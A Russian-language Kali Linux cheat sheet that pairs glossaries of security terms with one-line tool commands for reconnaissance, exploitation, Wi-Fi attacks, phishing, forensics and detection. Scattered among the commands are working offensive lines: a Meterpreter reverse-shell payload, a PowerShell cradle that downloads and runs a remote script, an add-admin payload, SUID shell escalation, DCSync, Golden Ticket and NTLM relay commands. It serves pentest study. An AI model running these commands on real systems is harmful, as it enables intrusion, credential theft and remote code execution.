Kali Linux — Команды и ТерминологияТерминология
- OSINT — разведка из открытых источников (Open Source Intelligence).
- Метаданные — информация о файлах, фото, видео (EXIF, GPS, дата создания).
- Цифровой след — активность в сети (соцсети, форумы, утечки).
- Скрейпинг — автоматический сбор данных с веб-страниц.
- Даркнет — скрытая часть интернета (Tor, I2P).
- Google Dorks — специальные поисковые запросы для поиска уязвимостей.
- Recon-ng — фреймворк для разведки.
- Пентест — тестирование на проникновение (оценка безопасности).
- Эксплойт — код для использования уязвимостей.
- Payload — вредоносная нагрузка (Meterpreter, Shell).
- Privilege Escalation — повышение привилегий (root/admin).
- Lateral Movement — перемещение внутри сети.
- CVE — база уязвимостей (Common Vulnerabilities and Exposures).
- OWASP Top 10 — топ-10 веб-уязвимостей.
- Эксплойт — код, использующий уязвимость в системе.
- Zero-day — неизвестная уязвимость без патча.
- ROP — Return-Oriented Programming (техника обхода DEP).
- ASLR — рандомизация адресного пространства.
- Buffer Overflow — переполнение буфера.
- Shellcode — машинный код для выполнения в эксплойте.
- Metasploit — фреймворк для разработки эксплойтов.
- TCP/IP — стек сетевых протоколов.
- OSI — модель взаимодействия сетевых протоколов.
- NAT — преобразование сетевых адресов.
- VPN — виртуальная частная сеть.
- IDS/IPS — системы обнаружения/предотвращения вторжений.
- MAC-адрес — уникальный идентификатор сетевого устройства.
- ARP — протокол определения MAC-адреса.
- Red Team — команда, имитирующая атаки.
- Blue Team — команда защиты.
- Purple Team — взаимодействие Red и Blue.
- APT — целевая продвинутая атака.
- C2 — Command and Control (сервер управления).
- Lateral Movement — перемещение внутри сети.
- Persistence — поддержание доступа к системе.
Kali Команды
theHarvester -d example.com -b all
— сбор информации о доменеwhois example.com
— информация о доменеmetagoofil -d example.com -t pdf
— поиск и скачивание документовexiftool image.jpg
— просмотр метаданныхsherlock username
— поиск пользователя в соцсетяхrecon-ng
— фреймворк для разведкиmaltego
— визуализация связей
nmap -sV -A target.com
— сканирование портов и сервисовmsfconsole
— запуск Metasploit Frameworksearchsploit apache 2.4
— поиск эксплойтовsqlmap -u "http://site.com/page?id=1"
— тестирование SQL-инъекцийburpsuite
— инструмент для тестирования веб-приложенийnikto -h http://target.com
— сканер уязвимостей веб-сервераhydra -l user -P passlist.txt ssh://target
— брутфорс аутентификации
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 -f exe > payload.exe
— создание полезной нагрузкиexploit/multi/handler
— обработчик Metasploit для payloadsearchsploit -x linux/local/12345
— просмотр кода эксплойтаgdb -q ./vulnerable_program
— отладка программыchecksec --file=/bin/ls
— проверка защит бинарного файлаpattern_create.rb 500
— создание шаблона для поиска смещенияropper --file=bin --search "pop rdi"
— поиск ROP-гаджетов
nmap -sS -p- 192.168.1.1
— TCP SYN сканированиеtcpdump -i eth0 port 80
— перехват трафика на порту 80wireshark
— анализ сетевого трафикаnetcat -lvnp 4444
— прослушивание портаarp-scan -l
— сканирование сети по ARPiptables -L
— просмотр правил фаерволаsshuttle -r user@server 0.0.0.0/0
— VPN через SSH
cobaltstrike
— платформа для Red Team операцийmimikatz
— извлечение учетных данных Windowsbloodhound
— анализ домена Active Directoryimpacket-secretsdump administrator@target
— дамп хэшейpowershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEhUx1')"
— выполнение PowerShell скриптаempire
— пост-эксплуатационный фреймворкkerberoast
— атака на сервисные аккаунты Kerberos
Kali Linux — Дополнительные разделыТерминология
- Форензика — сбор и анализ цифровых доказательств.
- RAM-дамп — содержимое оперативной памяти.
- Живой анализ — исследование работающей системы.
- Мертвый анализ — исследование выключенной системы.
- Хеш-сумма — цифровой отпечаток файла (MD5, SHA1).
- Write blocker — устройство для защиты от записи.
- Timeline — временная шкала событий.
- Wi-Fi — беспроводная сеть.
- WPA/WPA2 — протоколы защиты Wi-Fi.
- Handshake — процесс аутентификации в Wi-Fi.
- SSID — имя беспроводной сети.
- MAC-фильтрация — контроль доступа по MAC-адресу.
- Deauth — атака отключения клиентов.
- Evil Twin — фальшивая точка доступа.
- Социнженерия — манипуляция людьми.
- Фишинг — поддельные страницы/письма.
- Вишинг — фишинг по телефону.
- Претекстинг — создание ложного сценария.
- Baiting — использование "приманки".
- Tailgating — проникновение вслед за сотрудником.
- SET — Social Engineering Toolkit.
- SQLi — внедрение SQL-кода.
- XSS — межсайтовый скриптинг.
- CSRF — подделка межсайтовых запросов.
- LFI/RFI — включение локальных/удаленных файлов.
- SSRF — подделка запросов на сервере.
- JWT — токены веб-аутентификации.
- CORS — политика кросс-доменных запросов.
- Шифрование — преобразование данных.
- Асимметричное — пара ключей (публичный/приватный).
- Симметричное — один ключ для шифрования/дешифровки.
- Хеш — необратимое преобразование (SHA, MD5).
- SSL/TLS — протоколы защищенного соединения.
- PGP — стандарт шифрования сообщений.
- Steganography — скрытие данных в других файлах.
- Стеганография — скрытие данных.
- LSB — метод замены младших битов.
- Spectrum — анализ частотного спектра.
- Watermarking — цифровые водяные знаки.
- Steghide — инструмент для стеганографии.
- Binwalk — анализ файлов на скрытые данные.
- Metadata — скрытая информация в файлах.
- Вредоносное ПО — программы для атак.
- Вирус — самокопирующийся код.
- Червь — самораспространяющаяся программа.
- Троян — маскируется под легальное ПО.
- Ransomware — шифрует данные для выкупа.
- Rootkit — скрывает свое присутствие.
- Botnet — сеть зараженных компьютеров.
Kali Команды
volatility -f memory.dump imageinfo
— анализ дампа памятиbinwalk image.jpg
— поиск скрытых данных в файлеforemost -i disk.img -o output
— восстановление удаленных файловstrings file.bin | grep "password"
— поиск строк в бинарном файлеdd if=/dev/sda1 of=image.dd bs=4K
— создание образа дискаautopsy
— графический инструмент для форензикиphotorec
— восстановление удаленных файлов
airmon-ng start wlan0
— переход в режим монитораairodump-ng wlan0mon
— сканирование Wi-Fi сетейaireplay-ng --deauth 10 -a BSSID wlan0mon
— deauth атакаaircrack-ng handshake.cap -w wordlist.txt
— взлом WPAwash -i wlan0mon
— поиск WPS-сетейreaver -i wlan0mon -b BSSID -vv
— атака на WPSwifite
— автоматизированный инструмент для взлома Wi-Fi
setoolkit
— Social Engineering Toolkitgophish
— платформа для фишинговых кампанийevilginx2
— фреймворк для фишинга 2FAking-phisher
— фишинговая кампанияshellphish
— фишинг социальных сетейhidden-eye
— создание фишинговых страницsocialfish
— еще один инструмент для фишинга
dirb http://target.com
— поиск директорийgobuster dir -u http://target.com -w wordlist.txt
— перебор директорийwfuzz -c -z file,wordlist.txt --hc 404 http://target.com/FUZZ
— фаззингcommix --url="http://target.com/?id=1"
— тестирование на RCExsstrike -u "http://target.com/search?q=test"
— тестирование на XSSwhatweb target.com
— идентификация веб-технологийsubfinder -d target.com
— поиск поддоменов
openssl aes-256-cbc -salt -in file.txt -out file.enc
— шифрование файлаopenssl aes-256-cbc -d -in file.enc -out file.txt
— дешифрованиеgpg --encrypt --recipient [email protected] file.txt
— шифрование GPGgpg --decrypt file.txt.gpg
— дешифрование GPGhashcat -m 0 hash.txt wordlist.txt
— брутфорс хэшейjohn --format=raw-md5 --wordlist=wordlist.txt hash.txt
— взлом хэшейsslscan target.com
— анализ SSL/TLS настроек
steghide embed -cf image.jpg -ef secret.txt
— скрытие данныхsteghide extract -sf image.jpg
— извлечение данныхstegosuite image.jpg
— графический инструмент стеганографииstegdetect image.jpg
— обнаружение стеганографииzsteg image.png
— обнаружение данных в PNGoutguess -r image.jpg output.txt
— извлечение данныхstegsolve
— анализ изображений на скрытые данные
strings malware.exe
— анализ строк в бинарникеpeframe malware.exe
— анализ PE-файлаcapa malware.exe
— анализ возможностей вредоносаyara -r rules.yar suspicious_file
— обнаружение вредоносовradare2 -AAA malware.exe
— дизассемблированиеghidra
— реверс-инжинирингcuckoo
— песочница для анализа вредоносов
Kali Linux — Продвинутые техникиТерминология
- SUID/SGID — исполняемые файлы с повышенными привилегиями
- Capabilities — гранулярные права Linux-процессов
- Kernel Exploit — эксплуатация уязвимостей ядра
- Sudo Hijacking — подмена переменных окружения sudo
- DLL Hijacking — подмена библиотек в Windows
- Token Impersonation — кража токенов в Windows
- AlwaysInstallElevated — уязвимая политика Windows
- Kerberoasting — атака на сервисные аккаунты Kerberos
- Golden Ticket — поддельные TGT-билеты Kerberos
- DCSync — синхронизация хэшей с контроллера домена
- Pass-the-Hash — аутентификация без пароля
- BloodHound — анализ путей атак в AD
- GPO Abuse — эксплуатация групповых политик
- Unconstrained Delegation — неограниченное делегирование
- Service Discovery — обнаружение сетевых сервисов
- OS Fingerprinting — определение ОС по отпечаткам
- SMB Enumeration — сбор информации через SMB
- SNMP Walking — перебор SNMP-объектов
- LDAP Recon — разведка через LDAP-запросы
- DNS Zone Transfer — перенос DNS-зоны
- Cloud Metadata — сбор данных облачных провайдеров
- Disassembly — преобразование бинарного кода в ассемблер
- Decompilation — восстановление исходного кода
- Debugging — пошаговое выполнение программы
- Function Analysis — анализ функций программы
- ROP Chains — цепочки для обхода DEP
- Anti-Debugging — техники против отладки
- Packing/Unpacking — упаковка/распаковка исполняемых файлов
- Stack Overflow — переполнение стека
- Heap Overflow — переполнение кучи
- Format String — атака на строки формата
- Use-After-Free — использование освобожденной памяти
- ASLR Bypass — обход рандомизации адресов
- NX/DEP Bypass — обход запрета исполнения
- ROP/JOP — программирование через return/jump-ориентированные цепочки
- IoC — индикаторы компрометации
- EDR Evasion — обход систем защиты конечных точек
- Sysmon Analysis — анализ логов Sysmon
- YARA Rules — правила для обнаружения вредоносов
- Sigma Rules — универсальные правила детектирования
- Memory Forensics — анализ оперативной памяти
- Lateral Movement Detection — обнаружение перемещений в сети
Kali Команды
find / -perm -u=s -type f 2>/dev/null
— поиск SUID-файловpython -c 'import os; os.execl("/bin/sh", "sh", "-p")'
— эксплуатация SUIDgetcap -r / 2>/dev/null
— поиск capabilitiessudo -l
— проверка доступных sudo-командwindows-exploit-suggester.py --update
— поиск уязвимостей Windowssecretsdump.py -sam sam.save -system system.save LOCAL
— дамп хэшейmsfvenom -p windows/adduser USER=hacker PASS=Hack123! -f exe > user.exe
— создание пользователя
GetUserSPNs.py -request -dc-ip 10.10.10.1 domain/user
— Kerberoastingsecretsdump.py -just-dc domain/[email protected]
— DCSync атакаticketer.py -nthash aad3b435b51404eeaad3b435b51404ee -domain-sid S-1-5-21-... Administrator
— Golden Ticketbloodhound-python -d domain -u user -p 'pass' -ns 10.10.10.1 -c All
— сбор данных для BloodHoundsmbmap.py -H 10.10.10.1 -u user -p 'pass'
— перебор SMB-ресурсовntlmrelayx.py -tf targets.txt -smb2support
— NTLM Relay атакаlookupsid.py domain/[email protected]
— перебор SID
nmap -sV -sC -oA scan 10.10.10.1
— базовое сканированиеsmbclient -L //10.10.10.1 -U user
— список SMB-ресурсовsnmpwalk -c public -v1 10.10.10.1
— SNMP-разведкаldapsearch -x -h 10.10.10.1 -b "dc=domain,dc=local"
— LDAP-запросыdig axfr @10.10.10.1 domain.local
— DNS Zone Transfercurl http://169.254.169.254/latest/meta-data/
— облачные метаданные AWSenum4linux -a 10.10.10.1
— комплексная разведка Windows
objdump -d binary
— дизассемблированиеgdb -q ./binary
— отладка в GDBradare2 -AAA ./binary
— анализ в radare2ghidra
— запуск Ghidrastrings ./binary
— извлечение строкltrace ./binary
— трассировка библиотечных вызововstrace ./binary
— трассировка системных вызовов
checksec --file=binary
— проверка защитpattern_create.rb 500
— создание шаблонаropper --file=binary --search "pop rdi"
— поиск ROP-гаджетовmsf-pattern_offset -l 500 -q 0x41413741
— поиск смещенияone_gadget /lib/x86_64-linux-gnu/libc.so.6
— поиск one-gadgetpwntools
— фреймворк для эксплоитовROPgadget --binary binary
— поиск гаджетов
yara -r rules.yar /suspicious
— сканирование YARAchainsaw hunt
— анализ логов с Chainsawvelociraptor query "SELECT * FROM pslist()"
— сбор данныхhayabusa ./logs
— анализ событий Windowssigma-scan -r rules/ -e ./logs
— применение Sigma-правилvolatility -f memory.dump pslist
— анализ процессов в дампеzeek -r traffic.pcap
— анализ сетевого трафика